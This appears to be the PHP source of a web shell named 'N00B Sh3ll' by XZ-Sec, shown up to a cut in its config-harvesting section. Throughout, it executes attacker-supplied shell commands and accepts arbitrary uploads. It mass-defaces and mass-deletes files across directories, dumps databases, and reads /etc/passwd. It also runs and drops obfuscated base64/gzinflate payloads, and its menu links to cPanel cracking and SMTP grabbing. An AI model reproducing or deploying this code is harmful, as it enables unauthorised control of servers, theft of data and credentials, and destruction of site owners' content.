N00B Sh3ll XZ-Sec

1. <html>
2. <head>
3. <title>N00B Sh3ll</title>
4. <meta name='author' content='XZ-Sec'>
5. <meta charset="UTF-8">
6. <style type='text/css'>
7. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
8. html {
9. background: #000000;
10. color: #ffffff;
11. font-family: 'Ubuntu';
12. font-size: 13px;
13. width: 100%;
14. }
15. li {
16. display: inline;
17. margin: 5px;
18. padding: 5px;
19. }
20. table, th, td {
21. border-collapse:collapse;
22. font-family: Tahoma, Geneva, sans-serif;
23. background: transparent;
24. font-family: 'Ubuntu';
25. font-size: 13px;
26. }
27. .table_home, .th_home, .td_home {
28. border: 1px solid #ffffff;
29. }
30. th {
31. padding: 10px;
32. }
33. a {
34. color: #ffffff;
35. text-decoration: none;
36. }
37. a:hover {
38. color: gold;
39. text-decoration: underline;
40. }
41. b {
42. color: gold;
43. }
44. input[type=text], input[type=password],input[type=submit] {
45. background: transparent;
46. color: #ffffff;
47. border: 1px solid #ffffff;
48. margin: 5px auto;
49. padding-left: 5px;
50. font-family: 'Ubuntu';
51. font-size: 13px;
52. }
53. textarea {
54. border: 1px solid #ffffff;
55. width: 100%;
56. height: 400px;
57. padding-left: 5px;
58. margin: 10px auto;
59. resize: none;
60. background: transparent;
61. color: #ffffff;
62. font-family: 'Ubuntu';
63. font-size: 13px;
64. }
65. .jancok {
66. border: 1px solid white;
67. color: aqua;
68. background: transparent;
69. height: 150px;
70. width: 350px;
71. }
72. input { background: transparent; color: white; border: 1px solid white; }
73. </style>
74. </head>
75. <?php
76. ###############################################################################
77. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
78. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
79. // Tapi Recodednya, itu hasil kreasi N00B Shell sendiri.
80. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
81. // Greetz: All My Friends.
82. ###############################################################################
83. function w($dir,$perm) {
84. if(!is_writable($dir)) {
85. return "<font color=red>".$perm."</font>";
86. } else {
87. return "<font color=lime>".$perm."</font>";
88. }
89. }
90. function exe($cmd) {
91. if(function_exists('system')) {
92. @ob_start();
93. @system($cmd);
94. $buff = @ob_get_contents();
95. @ob_end_clean();
96. return $buff;
97. } elseif(function_exists('exec')) {
98. @exec($cmd,$results);
99. $buff = "";
100. foreach($results as $result) {
101. $buff .= $result;
102. } return $buff;
103. } elseif(function_exists('passthru')) {
104. @ob_start();
105. @passthru($cmd);
106. $buff = @ob_get_contents();
107. @ob_end_clean();
108. return $buff;
109. } elseif(function_exists('shell_exec')) {
110. $buff = @shell_exec($cmd);
111. return $buff;
112. }
113. }
114. function perms($file){
115. $perms = fileperms($file);
116. if (($perms & 0xC000) == 0xC000) {
117. // Socket
118. $info = 's';
119. } elseif (($perms & 0xA000) == 0xA000) {
120. // Symbolic Link
121. $info = 'l';
122. } elseif (($perms & 0x8000) == 0x8000) {
123. // Regular
124. $info = '-';
125. } elseif (($perms & 0x6000) == 0x6000) {
126. // Block special
127. $info = 'b';
128. } elseif (($perms & 0x4000) == 0x4000) {
129. // Directory
130. $info = 'd';
131. } elseif (($perms & 0x2000) == 0x2000) {
132. // Character special
133. $info = 'c';
134. } elseif (($perms & 0x1000) == 0x1000) {
135. // FIFO pipe
136. $info = 'p';
137. } else {
138. // Unknown
139. $info = 'u';
140. }
141. // Owner
142. $info .= (($perms & 0x0100) ? 'r' : '-');
143. $info .= (($perms & 0x0080) ? 'w' : '-');
144. $info .= (($perms & 0x0040) ?
145. (($perms & 0x0800) ? 's' : 'x' ) :
146. (($perms & 0x0800) ? 'S' : '-'));
147. // Group
148. $info .= (($perms & 0x0020) ? 'r' : '-');
149. $info .= (($perms & 0x0010) ? 'w' : '-');
150. $info .= (($perms & 0x0008) ?
151. (($perms & 0x0400) ? 's' : 'x' ) :
152. (($perms & 0x0400) ? 'S' : '-'));
153. // World
154. $info .= (($perms & 0x0004) ? 'r' : '-');
155. $info .= (($perms & 0x0002) ? 'w' : '-');
156. $info .= (($perms & 0x0001) ?
157. (($perms & 0x0200) ? 't' : 'x' ) :
158. (($perms & 0x0200) ? 'T' : '-'));
159. return $info;
160. }
161. function hdd($s) {
162. if($s >= 1073741824)
163. return sprintf('%1.2f',$s / 1073741824 ).' GB';
164. elseif($s >= 1048576)
165. return sprintf('%1.2f',$s / 1048576 ) .' MB';
166. elseif($s >= 1024)
167. return sprintf('%1.2f',$s / 1024 ) .' KB';
168. else
169. return $s .' B';
170. }
171. function ambilKata($param, $kata1, $kata2){
172. if(strpos($param, $kata1) === FALSE) return FALSE;
173. if(strpos($param, $kata2) === FALSE) return FALSE;
174. $start = strpos($param, $kata1) + strlen($kata1);
175. $end = strpos($param, $kata2, $start);
176. $return = substr($param, $start, $end - $start);
177. return $return;
178. }
179. if(get_magic_quotes_gpc()) {
180. function idx_ss($array) {
181. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
182. }
183. $_POST = idx_ss($_POST);
184. }
185.  
186. error_reporting(0);
187. error_log(0);
188. @ini_set('error_log',NULL);
189. @ini_set('log_errors',0);
190. @ini_set('max_execution_time',0);
191. @set_time_limit(0);
192. if(isset($_GET['dir'])) {
193. $dir = $_GET['dir'];
194. chdir($_GET['dir']);
195. } else {
196. $dir = getcwd();
197. }
198. $dir = str_replace("\\","/",$dir);
199. $scdir = explode("/", $dir);
200. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
201. $ds = @ini_get("disable_functions");
202. $sock = (function_exists('socket_create')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
203. $mlr = (function_exists('mail')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
204. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
205. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
206. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
207. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
208. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
209. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
210. if(!function_exists('posix_getegid')) {
211. $user = @get_current_user();
212. $uid = @getmyuid();
213. $gid = @getmygid();
214. $group = "?";
215. } else {
216. $uid = @posix_getpwuid(posix_geteuid());
217. $gid = @posix_getgrgid(posix_getegid());
218. $user = $uid['name'];
219. $uid = $uid['uid'];
220. $group = $gid['name'];
221. $gid = $gid['gid'];
222. }
223. echo '<table width="100%"><td align="right">';
224. echo "System: <font color=lime>".php_uname()."</font><br>";
225. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
226. echo "Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
227. echo "HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font><br>";
228. echo "Safe Mode: $sm<br>";
229. echo "Disable Functions: $show_ds<br>";
230. echo "Socket Funtion: $sock<br>";
231. echo "Mailer Funtion: $sock<br>";
232. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
233. echo "Current DIR: ";
234. foreach($scdir as $c_dir => $cdir) {
235. echo "<a href='?dir=";
236. for($i = 0; $i <= $c_dir; $i++) {
237. echo $scdir[$i];
238. if($i != $c_dir) {
239. echo "/";
240. }
241. }
242. echo "'>$cdir</a>/";
243. }
244. echo "</td></table><hr>";
245. if($_POST['upload']) {
246. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
247. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
248. } else {
249. $act = "<font color=red>failed to upload file</font>";
250. }
251. }
252. echo "Upload File: [ ".w($dir,"Writeable")." ]<br><br><form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
253. echo $act;
254. echo "<hr>";
255. $ip = $_SERVER['REMOTE_ADDR'];
256. echo "</center><table width='100%'>Telnet Execution Command<hr><td align='left'>
257. <form enctype='multipart/form-data' method='post'>
258. $user@$ip:~# <input type='text' name='cok'>
259. <input type='submit' value='~'>
260. </form>";
261. chdir($dir);
262. if(isset($_POST['cok'])) {
263. $cok = exe($_POST['cok']);
264. }
265. echo '<textarea style="width: 100%; height: 150px;" rows="10">' . htmlentities($cok) . '</textarea></td>';
266. echo '<td align="right">';
267. echo "<ul>";
268. echo "<li>[ <a href='?'>Home</a> ]</li>";
269. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
270. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
271. echo "<li>[ <a href='?dir=$dir&do=socket'>Socket Server</a> ]</li>";
272. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
273. echo "<li>[ <a href='?dir=$dir&dbdump'>DB Dumper</a> ]</li><br>";
274. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
275. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
276. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
277. echo "<li>[ <a href='?dir=$dir&do=mailer'>Mailer</a> ]</li>";
278. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li><br>";
279. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
280. echo "<li>[ <a href='?dir=$dir&do=revip'>Reverse IP</a> ]</li>";
281. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
282. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
283. echo "<li>[ <a href='?dir=$dir&do=sym'>Symlink</a> ]</li>";
284. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li><br>";
285. echo "<li>[ <a href='?dir=$dir&do=ende'>Encode & Decode</a> ]</li>";
286. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
287. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li><br>";
288. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
289. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
290. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
291. echo "</ul></td></table><hr>";
292. if($_GET['do'] == 'socket') {
293. echo '<hr>';
294. echo '<br><br><form enctype="multipart/form-data" method="post">Port : <input type="text" name="port" placeholder="1987"><br><br>HTML : <br><br><textarea style="width: 45%" rows="5" name="html">IN HIDDEN WE RUSH</textarea><br><br><input type="submit" name="socket" value="Socket !!!"></form>'; if(isset($_POST['socket'])) { set_time_limit(0); $address = '0.0.0.0'; $port = $_POST['port'];$htmlmu = $_POST['html']."\n";$sock = socket_create(AF_INET, SOCK_STREAM, 0); socket_bind($sock, $address, $port) or die('Tidak Bisa Connect Ke IP'); echo "\n Memulai Koneksi Pada Port $port \n\n"; while(1) { socket_listen($sock); $client = socket_accept($sock); $input = socket_read($client, 1024); $incoming = array(); $incoming = explode("\r\n", $input); $fetchArray = array(); $fetchArray = explode(" ", $incoming[0]); $file = $fetchArray[1];echo $fetchArray[0] . " Request " . $file . "\n"; $output = ""; $Header = "HTTP/1.1 200 OK \r\n" . "Server: IN HIDDEN WE RUSH\n" . "Raped By NoiseCrusT\n" . "Content-Type: text/html \r\n\r\n" . $htmlmu;$output = $Header; socket_write($client,$output,strlen($output)); socket_close($client); } } echo '&copy;Copyright Afrizal F.A</td></table></center>';
295. } elseif($_GET['do'] == 'ende') {
296. echo '<hr>';
297. eval(gzinflate(base64_decode('tVZdb5swFH2PlP9wZUWFSG1pu3WaksCmaX3epO5tmpABJ7FKbGabtmnV/z4bAyHlI8nDiJKAfe659rnnIpN4zcEZjxZSbVMSjEeXMX+A1/EIyivC8cNK8JwlFzFPuZgpgZnMsCBMzRswLhIiZnCdPYPkKU0A/81xA2CDy8E3ndCrMi4inmwhWhUIH0WpzojMeKxTEGHulpwpkPSF+OgWQQk0XCi4jwXNFNyxmCcEzuA7MTcLz4QEjs71lTIaSqJch+cqy1UY5cslEZStnPOr6RyaiITKLMXbkAjBhXTOQQPGo4kizwp8mIQ/f9z/+u2YBM4fPTEekUq+JRcb2BC15omPMi4VChaRKL561hBoxTDEKZbSR1rjYhvS/3wFgj9J/xYY3hAzkxAd6lURTRZJUhKrPQ4bxDNSCMYzRTmDR5zmejQXKWGWT98uPDvbxkVYkk8fUfCt+O/H5QIFMWePRKgwz/txqxfKlilWRKKgvocLiA7wSyVuUKB/Q8HV9YcjImr2/bATk/YHn7IWLTEKLGiAZaffwXV6ttzBGYtkNl9Qpr3brD0Ctc3MDvJoQ1VlheqpXNVdaQDN1yIYiJc1gW2ngsAzHi9aynwmFtloCztQNAZdgkulaakSNp3qV8qEZzt4YVqDlU9UxWtw9ewUXmOtAzhWDWcGE52d+vYxtG52i3Y0fRnp/niY2wgtsgMV3t0PqAvgrl4SUijeGLN05npHWZdnR7zPO8TWxyUPk5UU7Q3e9MW20r+Lrd8EOwKBn+rRbkXzhqA72w5HpId316Lqqk5XwfdLpJE4T9XMPr29DVlS/kdPJuRITza3WXqhsfV9tpM82UXctbijPHmAYtCTfbs50ZNDinZ7cjii7ckS31WHFmmfIE1TDrvSHhGOOgLo6YSzdBs4l2u10fooqiiRbrH66aXTPBZ45emoeh9/Cf4B')));
298.  
299. } elseif($_GET['do'] == 'revip') {
300. echo '<hr>';
301. function s57_curl($domen){
302. $c = curl_init();
303. $curl = array(
304. CURLOPT_URL=>"http://viewdns.info/reverseip/?host=".$domen."&t=1",
305. CURLOPT_USERAGENT=>"User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
306. CURLOPT_RETURNTRANSFER=>1,
307. CURLOPT_SSL_VERIFYPEER=>0,
308. CURLOPT_HEADER=>0,
309. CURLOPT_FOLLOWLOCATION=>1);
310. curl_setopt_array($c,$curl);
311. $e = curl_exec($c);
312. curl_close($c);
313. return $e;
314. }
315. function s57_p($pemisah,$string){
316. return explode(chr(1),str_replace($pemisah,chr(1),$string));
317. }
318.  
319. echo "<form method='post'>
320. <center><input class='text' type='text' name='domain' placeholder='IP/Domain' style='width: 250px; height: 33px;'><input class='submit' type='submit' name='sbmt' style='color: lime; width: 30px; height: 33px;' value='>>'>
321. <br><span style='font-size: 17px;'> Masukin site tanpa http atau https </span></form>";
322.  
323. if(isset($_POST['sbmt'])){
324. echo "Result for : " .$_POST['domain'];
325. $r = s57_p(array('<table border="1">','<table width="1000" border="0">'),s57_curl($_POST['domain']));
326. echo "<table border=1>";
327. echo $r[1];
328. echo "</table></center>";
329. }
330.  
331. } elseif(isset($_GET['dbdump'])) {
332. chdir($dir);
333. echo '<pre><center>';
334. echo '
335. <form action=?dbdump method=post>
336. Database Dump
337. Server : <input class="inputz" type=text name=server size=52>
338. Username : <input class="inputz" type=text name=username size=52>
339. Password : <input class="inputz" type=text name=password size=52>
340. DataBase Name : <input class="inputz" type=text name=dbname size=52>
341. DB Type : <form method=post action="?dbdump"><select class="inputz" name=method><option value="gzip">Gzip</option><option value="sql">Sql</option></select>
342. <input class="inputzbut" type=submit value=" Dump! " >
343. </form></center></pre><script>';
344. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
345. $date = date("Y-m-d");
346. $dbserver = $_POST['server'];
347. $dbuser = $_POST['username'];
348. $dbpass = $_POST['password'];
349. $dbname = $_POST['dbname'];
350. $file = "Dump-$dbname-$date";
351. $method = $_POST['method'];
352. if ($method=='sql'){
353. $file="Dump-$dbname-$date.sql";
354. $fp=fopen($file,"w");
355. }else{
356. $file="Dump-$dbname-$date.sql.gz";
357. $fp = gzopen($file,"w");
358. }
359. function write($data) {
360. global $fp;
361. if ($_POST['method']=='ssql'){
362. fwrite($fp,$data);
363. }else{
364. gzwrite($fp, $data);
365. }}
366. mysql_connect ($dbserver, $dbuser, $dbpass);
367. mysql_select_db($dbname);
368. $tables = mysql_query ("SHOW TABLES");
369. while ($i = mysql_fetch_array($tables)) {
370. $i = $i['Tables_in_'.$dbname];
371. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
372. write($create['Create Table'].";nn");
373. $sql = mysql_query ("SELECT * FROM ".$i);
374. if (mysql_num_rows($sql)) {
375. while ($row = mysql_fetch_row($sql)) {
376. foreach ($row as $j => $k) {
377. $row[$j] = "'".mysql_escape_string($k)."'";
378. }
379. write("INSERT INTO $i VALUES(".implode(",", $row).");n");
380. }
381. }
382. }
383. if ($method=='ssql'){
384. fclose ($fp);
385. }else{
386. gzclose($fp);}
387. header("Content-Disposition: attachment; filename=" . $file);
388. header("Content-Type: application/download");
389. header("Content-Length: " . filesize($file));
390. flush();
391.  
392. $fp = fopen($file, "r");
393. while (!feof($fp))
394. {
395. echo fread($fp, 65536);
396. flush();
397. }
398. fclose($fp);
399. }
400.  
401. } elseif($_GET['do'] == 'sym') {
402. chdir($path);
403. $ns = 'sym.php';
404. $fp = fopen($ns, 'w');
405. $lcr = '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';
406. $lco = gzinflate(base64_decode($lcr));
407. fwrite($fp, $lco);
408. fclose($fp);
409. echo "<a href='$path/sym.php'>Symlink !!!</a>";
410. } elseif($_GET['do'] == 'mailer') {
411. echo '<hr>
412. Mailer Function : </font>'.$mlr.'<br><br>
413. <form enctype="multipart/form-data" method="post">
414. Massage : <br><textarea class="textarea" rows="10" cols="100" name ="cok"></textarea></br><br>
415. Target : <input type="text" name ="mail" placeholder="noisecrust@hackermail.com"></br>
416. <input type="submit" name="crot" value="Kirim">
417. </form>';
418. if(isset($_POST['crot'])) {
419. $to = $_POST['mail'];
420. $subject = "Pesan";
421. $message = "" .$_POST['cok'];
422. if(mail($to,$subject,$message)) {
423. echo '<center>Terkirim</center>';
424. } else {
425. echo 'Gagal :(';
426. }
427. }
428. } elseif($_GET['do'] == 'cmd') {
429. echo "<form method='post'>
430. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
431. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
432. </form>";
433. if($_POST['do_cmd']) {
434. echo "<pre>".exe($_POST['cmd'])."</pre>";
435. }
436. } elseif($_GET['do'] == 'mass_deface') {
437. function sabun_massal($dir,$namafile,$isi_script) {
438. if(is_writable($dir)) {
439. $dira = scandir($dir);
440. foreach($dira as $dirb) {
441. $dirc = "$dir/$dirb";
442. $lokasi = $dirc.'/'.$namafile;
443. if($dirb === '.') {
444. file_put_contents($lokasi, $isi_script);
445. } elseif($dirb === '..') {
446. file_put_contents($lokasi, $isi_script);
447. } else {
448. if(is_dir($dirc)) {
449. if(is_writable($dirc)) {
450. echo "[<font color=lime>DONE</font>] $lokasi<br>";
451. file_put_contents($lokasi, $isi_script);
452. $idx = sabun_massal($dirc,$namafile,$isi_script);
453. }
454. }
455. }
456. }
457. }
458. }
459. function sabun_biasa($dir,$namafile,$isi_script) {
460. if(is_writable($dir)) {
461. $dira = scandir($dir);
462. foreach($dira as $dirb) {
463. $dirc = "$dir/$dirb";
464. $lokasi = $dirc.'/'.$namafile;
465. if($dirb === '.') {
466. file_put_contents($lokasi, $isi_script);
467. } elseif($dirb === '..') {
468. file_put_contents($lokasi, $isi_script);
469. } else {
470. if(is_dir($dirc)) {
471. if(is_writable($dirc)) {
472. echo "[<font color=lime>DONE</font>] $lokasi<br>";
473. file_put_contents($lokasi, $isi_script);
474. }
475. }
476. }
477. }
478. }
479. }
480. if($_POST['start']) {
481. if($_POST['tipe_sabun'] == 'mahal') {
482. echo "<div style='margin: 5px auto; padding: 5px'>";
483. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
484. echo "</div>";
485. } elseif($_POST['tipe_sabun'] == 'murah') {
486. echo "<div style='margin: 5px auto; padding: 5px'>";
487. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
488. echo "</div>";
489. }
490. } else {
491. echo "<center>";
492. echo "<form method='post'>
493. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
494. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
495. <font style='text-decoration: underline;'>Folder:</font><br>
496. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
497. <font style='text-decoration: underline;'>Filename:</font><br>
498. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
499. <font style='text-decoration: underline;'>Index File:</font><br>
500. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by XZ-Sec</textarea><br>
501. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
502. </form></center>";
503. }
504. } elseif($_GET['do'] == 'mass_delete') {
505. function hapus_massal($dir,$namafile) {
506. if(is_writable($dir)) {
507. $dira = scandir($dir);
508. foreach($dira as $dirb) {
509. $dirc = "$dir/$dirb";
510. $lokasi = $dirc.'/'.$namafile;
511. if($dirb === '.') {
512. if(file_exists("$dir/$namafile")) {
513. unlink("$dir/$namafile");
514. }
515. } elseif($dirb === '..') {
516. if(file_exists("".dirname($dir)."/$namafile")) {
517. unlink("".dirname($dir)."/$namafile");
518. }
519. } else {
520. if(is_dir($dirc)) {
521. if(is_writable($dirc)) {
522. if(file_exists($lokasi)) {
523. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
524. unlink($lokasi);
525. $idx = hapus_massal($dirc,$namafile);
526. }
527. }
528. }
529. }
530. }
531. }
532. }
533. if($_POST['start']) {
534. echo "<div style='margin: 5px auto; padding: 5px'>";
535. hapus_massal($_POST['d_dir'], $_POST['d_file']);
536. echo "</div>";
537. } else {
538. echo "<center>";
539. echo "<form method='post'>
540. <font style='text-decoration: underline;'>Folder:</font><br>
541. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
542. <font style='text-decoration: underline;'>Filename:</font><br>
543. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
544. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
545. </form></center>";
546. }
547. } elseif($_GET['do'] == 'config') {
548. $etc = fopen("/etc/passwd", "r");
549. $idx = mkdir("idx_config", 0777);
550. $isi_htc = "Options all\nRequire None\nSatisfy Any";
551. $htc = fopen("idx_config/.htaccess","w");
552. fwrite($htc, $isi_htc);
553. while($passwd = fgets($etc)) {
